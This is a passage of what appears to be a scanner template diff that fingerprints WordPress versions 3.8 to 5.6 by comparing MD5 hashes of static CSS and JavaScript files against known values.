"(\"e8e8c2726be86a0e5959689f83e68b4a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"28e1652d049ca7d1148616a9a65e4a84\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"df2e2d4114e8251bb20c7ab20d24cf37\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"1ced6b0ebd2b03929234bb3754dac0e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/wp-content.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"012706854c5bf037e8234aab32868fc8\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"dd1d6bb4548f4ee2ab740d8ba89b1b35\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"78532b5f1feda917ca31dc124122036a\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"8a9b561b793a96bad45a0b3034a260cf\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"07743f0d829a3e47573f7bdf68760ff9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"16f8552760a0f3145c25184108b9a2f2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fa017da44bc83b2b437dbd75623012d7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f1aacaf6e127e33987f04a8304d4764d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1cd99e8652d4e846316f6af433bc58b6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f6c2d0436843a5aa1a7fb39eeb6561b1\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1b587c086fe03c005a9f2f4fca8afecf\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"358d04384b5ffaf9f39f6055b5d274a8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"3f256721ed5311483335c0067e619f54\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"78379f2a26af532dad0097d4521508e1\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.3.6 + dsl: + - "(\"8091ca12bafbea286c007455dd00ed62\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"81fc83c10f836091c606556e000d88b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/text-widgets.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"c1fd80a457b96b2fe7aecf56afe62fd3\" == md5(body))" + - type: dsl + name: 4.8.1 + dsl: + - "(\"2eda0fba7c33c68b92a25d71e49f24f7\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"bff1d54a16cd5b99c51bb68b6d9cde1b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"62f4cd853c19bd9b7e2836395d2ffcf6\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"b767d49874c4dc6a0381b45973d41152\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"22a80b79f36eac9e6b9c1c60e217ac47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/skin.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b7da29baf0549e017bdeaa2d836db37b\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"27fe3311345b14cc022a9682a0e658da\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"365dc556b970abfe2840e817186cdf42\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"190bf976f841dfc921911f6aaf812b81\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"54ae8d249d7e018ff9f44e8de2ff7a73\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"fa7377e0da20941e25af2944599e42db\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"14dc424b662c53b5f48fecdc03772c88\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"c12daa75772a539d80c0bfffae2db05d\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"3a92e071e9dcec15972d4952c9bbe996\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ddef4827730dca9bd4f3a4d0deb11449\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"02160ddc16e5daa2ad1bf211dcc6914f\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"d46efe6ed170dbdd5b1b09ca55a35569\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"084491ba9b612bfaf8a5206e445e0845\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"55d1c98c7185470d72930e7690f9168c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"535a474e0799c2da9168379230ea07fd\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"13fe85bf5c96a042969ca526e87077c7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dfedff5a5003bd85df8740d7589d17c4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cb97bb7d8f7b5813d00c74f495df42e4\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"8b29881cd8a024af1c890f689893e50b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"9338a0c97b787ee5a176b5cd7e830061\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"99211a5746557a4d67717867f9ae8c62\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"929931f07eb6f9063098fb589b618d52\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3518d1b1e45e704aeecc47c0b5e5fae0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8d7de25287ecf81d4e0d04534fa900d0\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"11cc83c491b4dadcb47aa960562385fb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9603270ee78215cb5372db4ee9ff4d34\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"47ec7f3b440692e1d196533fac8e2ded\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f91d3fa65fded514fdc32d5e48fa7eb9\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2300f3cb6ec82e006d841f5b24a3374c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a9505503536e4d8709a8751e2a03bfab\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"2651332a375f96ccacd875fc87d9613e\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"972821b1f65532c5ee37170add513ed8\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"68051b391e123c7f627fb6532d169f1a\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"84449df9bef860843f536972b82c8742\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f9672f0bd5557a33098c1be90036dd6f\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"129c377e3bec6b64007097e246a55b6e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"55a0910147a43f0be506255b7232090f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"644b1f497f37168efa0876e9a41c3a35\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d69489d26322d01d3b284a6b71a65f9a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"80e102718830b90c49d2d0bb280629c2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4e5f19d15fc3adfb371fdf5e050c8b9d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"eeccabc9952f2e1ba54a7b4abd49fafc\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"18340a88bc601743b7c70439cec488ed\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"633d5348edb8b8d16a1e5c73483fa94a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"886bbb60c2a052bdce63ec9fb620718a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c016c36ec090f0aa83236b712e01dc5f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"ddb7190d0c587934f493391b1edbccf4\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"1eabb79616c817d36c47003b9ac16aa0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"096b4b8513175c73b8879474611d6a0d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ba77e07e130710f8d3c5125fac3ac14d\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"37af32fba1f76c7699f53034138a5853\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"10a5a7deb7dc77912ba0d9a24d3ce8e2\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"ddf1a9c32c6b7c8f2839c03446c60db1\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"8cc327c4f903ca467722dded1259e72f\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"e05488e16a8e2b95591cd65507afe911\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ce122c37c5c54caea5e961c433149a71\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8f053c22ff721fc2522e7479ca836404\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4649feeb88af0d20436a518f89034c19\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"36da31029014d5cba2e1d6b2c3c94903\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"509e5f9805d5371f6afc4135fd361979\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7dcd4b68ece82d3d9cc5be62d079244d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"498b30f5cba3b1901b40567201b0700f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"43709ad04cfe4981c074767db4cec654\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e048709f08faeac3e1fdd8fb27869f0e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"6dcfd9b5c29f86a7338bb35b5026fc0d\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5a9869897cc9f0c7b41f4b03dbb86f58\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"44d81cafa065734abdb9239bc26e2c18\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c3b594ce028a37cad08301b857e7dec7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1f288a158ad8d61c363da63dfba3ce88\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ec86a046d8ac3cfec1b3f2511d713af4\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"b3e25847e2b09d594b37007464689fff\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"9bc1b13e10b32fd568b3d3fbd1503357\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f25aff923e7408ae683fea1f1e4127a2\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"5f6c9a9233a9b01c16d32a00dd3301f4\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"01dc03bb80f16b38e95ac5a0ce98873e\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"0193d4dcc30f98ff251feedf560eb32d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"aa7bd8d45c649f750fd00e59a4565c72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cbd6a9357f52f0a04bcd515642794f03\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d1ee46c95c1fee5816652ee120a70f6b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"32e6c9b314aa09741b00f3d25cbe93f8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e4274ca15d4a38aea20259bb83776ee5\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f090d9aa28ba371afd6f6b0b4e1969f2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1579864ea35ebc26521222e136a961e7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"0c5569b8a2822ed086e78645b0c9f1de\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"81182ae080141e8caa991886071853e0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"dab7d054761842a41231761529e35c9d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"b31e789f4c8dea9698cd4eb0c9d1f48d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"64d732bae20f1bd9f1a39d28f479a35a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"83667ac765db3b096efae880799fba9b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"84292fd29fb971d80e6a76ba0b5252c6\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"bed194a77cb90e543b2ac3ea1c5e1c24\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"dc6ebc6bdf60e83bd93105a5f67b793d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f86f42cf3ea35d6a9c823366d3ca9b8a\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"15a1fe1b601c5da6101f06d6430671d0\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"3ee5bb2a6e6a2251b99f91d353b2d984\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"e0f9becb2dd284efbc3fcad8243ff792\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0c90b3ca5dee78323591408173a74c0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"c2718052027e9d64f65fdcc683368af7\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"bc5202c7967dc638e75867f7b8a8b32f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4bd6b6b92b306b97ba3de1c2421fc3e8\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6a4efa94b2b654bef45f862cd92278ac\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"be0732f8240abe60df1783354817ade5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"5889a9c995d14bafefe1e5c886333930\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"66666c9489057795c2fee523d4403546\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c54630e1b0b4d089bbd6eef6bde0d456\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"0013fe5659a7e14442d3b2aa5af4a89d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e21cc147dadf70a8ec27483f9663a088\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6c5a320447670be2deb734eddda4dda1\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"991698abb4180f23c4b7cba489523fe9\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"f5e26181e72a0e064669c5c1c7ee902e\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"d5f4c00a19c9ff0ad97c4ad53776af9e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c25f45bff5d0545cb0244345338939d7\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"b994fe4dc1ef5cd815f63ca00be88b2e\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"1dced46a49d62dd08e7f69e3f16d286b\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"7d9d2c7d00a0dd30b706387aff516ed9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"39fbedd44ca7a270b0e7a5fab2e474b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"e15962b9d758ca2c599163ff60c6d528\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"7c366a0f8539b65522d1f9b537a3dbfd\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8c45e2cf777e40fe8b03318f0a193157\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ca11cd01b2e32f152a3e8c6a74a85811\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"83453647da515355dc45a661ab42ea38\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"11c1107a87cc83ff1df4e588554e349a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"8a605f4b01b48f4a6efa39949154c1a4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a7d3f86196983532af392984f57ba5f0\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"16115bd9c26d4331c193d20895a2f8ec\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4b919105096d441f974a99dc6bc9e243\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ce3859134e2fef6f56088bc505f46b48\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1b5f74ec13f8502f5786b2aa39d7d901\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"b2876ba5e8d94b461debeaefbcbe58ed\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"95b305399ec12bf249cd6b2cc86326a1\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0d1a0d8f3ab5b6e25f4f103f1d3cf86b\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"77b44680773c336a5659fc5a9c9fde6f\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"0e6724bfb006014e90657b5c56e32f5d\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"3d3fa848ebeee0e47d8413f2eac194cf\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9cedba0f9265f1b2b08d9138ad1bb036\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"51f80d9f509d4e6b4ea38713046e191b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b21f32953ad167424e9997c8ff5330ae\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"4aedfb3a03d238a248b4628c1e82ecb6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4dd99f07b59e50a102badca4bc47cca6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c3e46fa1074909ce32b410a3c854f4c8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9538ad4bdbecfe10e0bfac3898ee6286\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c6cba3cc3536f8a8fe608a3d0a9f2f77\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"8e0f8b89694e5b4a5d0ba46a6131216f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"baee08bf04fae25e404d79ad8a453441\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"e88d7626123a0d67492d7bc7546acb5d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"71e7589f78c5423719c15ebe510f4d25\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"738e2988d6f176a6417259f9514d5ee4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"848a1e64ad9724ed9e0a9c6d82069f3a\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"6238d0ebc1d2a983d66751824f6cb346\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"277685e5afc03cf65a847209b79d1726\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5e052b9c314c8bb2e0bc7fede0cf99f4\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4f949efcb806d798e79ebdf9aaf3b2ed\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"354c7b8d83ff3082546ce84bc35b68fa\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"76c9149b643865cb7eda2c945a277f26\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"76ecad6845904edb3738a64d07f44400\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"46d310711143ee1c98f788eeed72f49e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"093dcce1588c3b8cc4b40fc311974412\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"2c7b7f7ea3d09d89912f8a2190caf555\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a5e5038516f1c5931a290a13aff1a7c6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f906280467b81f0c303c11ecf5449a11\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"58f1d1b2e4ed824585e5cfa1757f49c1\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1d4145177c30d6f02944c86d0b58f102\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"7b047656b2f21f7355ee6745b28de219\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1a4202bd816477e41390b35e6f23a9e6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"650ae2f4d9930650021832a5b414e780\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"cf22f6cdf0c754d17e18968603839536\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"77c6202426a5983dffd4b82d6e2b765d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"178e8fa9b390e7f0054063aacf4adc81\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"8baf66f851e91365c2a21a3fbf653055\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"0ed3663628636356a6c1d4a5860ed575\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"8f458bd7c92c980080e17ae981fecc2c\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"07ce24d7e0075965b3276d32c9fdfc22\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"137ebc979d28ffb33eb9b131df733331\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"637446b49f93150cbc269d734466eba9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1395526a63e11cad214746d1a5367040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f9eaa22ba873fe30c5adecec9275dfef\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"0657508b14c063564f0001878ea88d07\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"d55664f8f653664ce2f4a360a7aabf7e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2155bdba4f4aa5090b8b8fe168c537f6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1c2a62ec116bd5398f75e699028af52d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7828a09a10e456933f4f44a27bc9e760\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"088645d63d59b9e2b876d25ecea8b591\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"4995824719b80769472867ab6a0f9d6e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6c2f1e4fbe3db1322b38e577bceeeb25\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"8234cd28ef883f225abf8061ccd3af9b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"bd3be68c8212aeabe5af215df5e0d0cb\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7636b2ab8523286785d75fd3d7e537e4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"acb549c4ac075b8c2af1138b234cf093\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"e475c1a0cd8fdfc4ded9551d5bed4ca5\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"ad984fa369ed10821d387cd909ea5649\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e3bd414de7534790a8761e1767e0f072\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4cb56002de1209c98e9ba405858cbbb4\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"5240a5d120f3de68f50aa14c42f42ebe\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"baddad393fd77ce3eded19a47f596189\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2481535f18cae31b8be4ed6d233b4158\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"58dae4b75a6f54d583e36870591fbc46\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9527914dee63a89cf72473fb23bf063f\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"99ac5a3755ed5acd78360f589e880dcf\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ff228ab4531174f9292c7d4689eea615\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8018aa2ae5df17ae3ba3b88fe1818fd8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + 